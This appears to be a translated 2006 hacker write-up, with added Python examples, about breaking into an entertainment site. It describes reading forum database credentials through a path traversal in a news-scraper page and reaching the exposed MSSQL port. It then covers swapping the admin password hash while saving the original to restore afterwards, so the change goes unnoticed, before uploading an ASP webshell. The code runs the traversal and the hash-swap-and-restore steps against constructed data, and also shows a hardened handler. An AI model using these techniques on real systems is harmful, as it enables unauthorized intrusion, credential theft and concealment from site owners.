Taken down in minutes: a quick vulnerability warning about an entertainment site (黑吧安全网, Heiba Security Net)

ID MYHACK58:6220066468
Type myhack58
Reporter 佚名 (Anonymous)
Modified 2006-01-18T00:00:00


“For her I am once again reluctant to talk about the theory of love, then cheerfully comfort others with understanding”, and as for me, “for it I once again strive to fight, once again working for myself......” Unfortunately, on this entertainment site's Saga private server the price of equipment had been driven sky-high, and I had no idea how to play; getting decent combat gear was very hard, and as the saying goes, the more oppressive the environment, the more you want to resist. Because the game server and the website sit on the same host, its server really did seem worth a look. I had meant to start with the forum, but unfortunately the forum runs Dvbbs (动网), and the latest version at that, so the published vulnerabilities had no effect; I had to start somewhere else. In the course of the analysis I found a very interesting vulnerability: the news "thief" (scraper) system written by the site's own programmer. Let's take a look at just how interesting it is.

Did you notice the URL in the IE address bar in Figure 1? It looks a little suspicious, and yes, it really is a problem. What follows is what I confirmed myself. Code inside "<% %>" tags is not displayed by the IE browser; you have to view the source before you can see the ASP code. As you can see, a filename that jumps directories with "../" is accepted as valid, which looks like a careless oversight. After I changed the URL and submitted it, "Show.asp" very obligingly read the file for me. Since there was no uploaded webshell yet, the plan was to upload an ASP backdoor through the BBS and rename it. So I pointed "Show.asp?Url=FileFullName" at the forum directory's "Conn.asp" to look at the forum's database connection information. Wow, everything was in there! The forum uses MSSQL, and the SQL database account is right there in "Conn.asp". Thinking it over carefully, though, the user is not "sa", so its permissions are not high; at most it can edit the forum database, which was a little disappointing. But on reflection, this level of permission is already enough to get a webshell, because I can modify every last thing in the database, including its BBS back-office admin account. Had they exposed the MSSQL port externally, though? Rather than speculate, I tested with "telnet IP 1433", and it connected; heaven really was on my side. The figure below shows me connected with "SqlBrowsers": since SQL statements are somewhat cumbersome and I was afraid of getting something wrong, modifying the data through a graphical interface avoids that unnecessary trouble. The tool is very simple, so I will not describe it here.
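The "Show.asp?Url=../Conn.asp" trick above is a classic path traversal: the handler joins an untrusted file name onto its news directory without canonicalising it. The following is an added example, not code from the article or from the site's ASP system (Show.asp is VBScript and is not reproduced here); it models the same mistake in Python beside a hardened version. The directory layout, file names and the credentials inside the constructed Conn.asp are made up for the demo.

```python
"""Path traversal in a 'show a cached page by name' handler.

Added example modelling the Show.asp?Url= bug: the vulnerable handler trusts the
Url parameter, so "../bbs/Conn.asp" walks out of the news directory and reads the
forum's database connection file. The hardened handler canonicalises the path and
requires it to stay inside the news directory and to be a cached .htm page.
All files below are constructed for the demo.
"""
import os
import tempfile

# Constructed layout: <root>/news holds cached pages, <root>/bbs is the forum.
ROOT = tempfile.mkdtemp()
NEWS_DIR = os.path.join(ROOT, "news")
BBS_DIR = os.path.join(ROOT, "bbs")
os.makedirs(NEWS_DIR)
os.makedirs(BBS_DIR)
with open(os.path.join(NEWS_DIR, "today.htm"), "w") as fh:
    fh.write("<h1>cached news</h1>")
with open(os.path.join(BBS_DIR, "Conn.asp"), "w") as fh:
    # Constructed stand-in for a Dvbbs Conn.asp; not a real credential.
    fh.write('<% SqlUser="bbsuser" : SqlPass="demo-secret" %>')


def show_vulnerable(url: str) -> str:
    """Mirrors the bug: the Url parameter is joined onto NEWS_DIR unchecked."""
    with open(os.path.join(NEWS_DIR, url)) as fh:
        return fh.read()


def show_hardened(url: str) -> str:
    """Resolve the path first, then refuse anything outside NEWS_DIR or not .htm.

    realpath() collapses '..' and symlinks, so the check is made on the file that
    would actually be opened, not on the string the client sent.
    """
    base = os.path.realpath(NEWS_DIR)
    target = os.path.realpath(os.path.join(base, url))
    if os.path.commonpath([base, target]) != base:
        raise PermissionError(f"path escapes the news directory: {url!r}")
    if not target.lower().endswith(".htm"):
        raise PermissionError(f"only cached .htm pages may be shown: {url!r}")
    with open(target) as fh:
        return fh.read()


def is_blocked(url: str) -> bool:
    """True when the hardened handler refuses the request."""
    try:
        show_hardened(url)
    except PermissionError:
        return True
    return False


if __name__ == "__main__":
    print("vulnerable:", show_vulnerable("../bbs/Conn.asp"))
    print("hardened today.htm:", show_hardened("today.htm"))
    print("hardened ../bbs/Conn.asp blocked:", is_blocked("../bbs/Conn.asp"))
```

Note that the hardened check rejects absolute paths too: os.path.join discards the base when the second argument is absolute, but realpath plus the commonpath comparison still catches the escape. An allowlist of file names is stronger still when the set of pages is known.
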
Once connected to MSSQL, open the Dvbbs forum database's "Dv_Admin" table. The next step is a bait and switch: first save the original "Password" ciphertext, so that once full control of the back end has been obtained the original ciphertext can be written back and nobody is the wiser; then use an MD5 password generator to produce a ciphertext for a password of my choosing and write that in instead. I will not explain the later steps here, because from that point on uploading the ASP file is almost the same as usual.
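The hash swap in the Dv_Admin table is the step that turns a low-privileged SQL account into forum administrator. The following is an added example, not the article's own code: an in-memory SQLite table stands in for the Dvbbs MSSQL database so the sequence runs offline. The column names (username, password), the single admin row and the 32-character hexadecimal MD5 format are assumptions; Dvbbs versions differ in how they store the hash, so the real column should be inspected before anything is written.

```python
"""Bait-and-switch on an admin table: save the original hash, replace it with
md5(chosen password), log in, restore the original afterwards.

Added example; the table, columns and the admin row are constructed here and the
32-hex MD5 format is an assumption about the Dvbbs schema.
"""
import hashlib
import sqlite3


def md5_hex(password: str) -> str:
    """The 'MD5 password generator' step: plain MD5 of the UTF-8 password."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def build_demo_db() -> sqlite3.Connection:
    """Constructed Dv_Admin table with one admin whose password we do not know."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Dv_Admin (username TEXT PRIMARY KEY, password TEXT)")
    conn.execute(
        "INSERT INTO Dv_Admin (username, password) VALUES ('admin', ?)",
        (md5_hex("unknown-original"),),
    )
    conn.commit()
    return conn


def swap_admin_hash(conn: sqlite3.Connection, username: str, new_password: str) -> str:
    """Replace the stored hash with md5(new_password); return the original hash."""
    row = conn.execute(
        "SELECT password FROM Dv_Admin WHERE username = ?", (username,)
    ).fetchone()
    if row is None:
        raise LookupError(f"no such admin: {username}")
    original = row[0]
    conn.execute(
        "UPDATE Dv_Admin SET password = ? WHERE username = ?",
        (md5_hex(new_password), username),
    )
    conn.commit()
    return original


def restore_admin_hash(conn: sqlite3.Connection, username: str, original: str) -> None:
    """Write the saved ciphertext back so the real admin can log in again."""
    conn.execute(
        "UPDATE Dv_Admin SET password = ? WHERE username = ?", (original, username)
    )
    conn.commit()


def login_ok(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """What the forum's back-end login does: compare md5(password) to the column."""
    row = conn.execute(
        "SELECT password FROM Dv_Admin WHERE username = ?", (username,)
    ).fetchone()
    return row is not None and row[0] == md5_hex(password)


if __name__ == "__main__":
    db = build_demo_db()
    saved = swap_admin_hash(db, "admin", "letmein")
    print("login with chosen password:", login_ok(db, "admin", "letmein"))
    restore_admin_hash(db, "admin", saved)
    print("original password works again:", login_ok(db, "admin", "unknown-original"))
```

The defender's reading of this is the point of the article: a database account that can UPDATE the admin table is equivalent to an admin login, whether or not it is "sa", so the forum's SQL credentials in Conn.asp plus a reachable port 1433 are a full compromise of the forum.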

Isn't it odd that a news scraper system with such a simple vulnerability put the security of the forum at risk, and that through the forum the whole system could then be compromised? By virtue of this one vulnerability the whole site was taken in just a few minutes; it really is strange.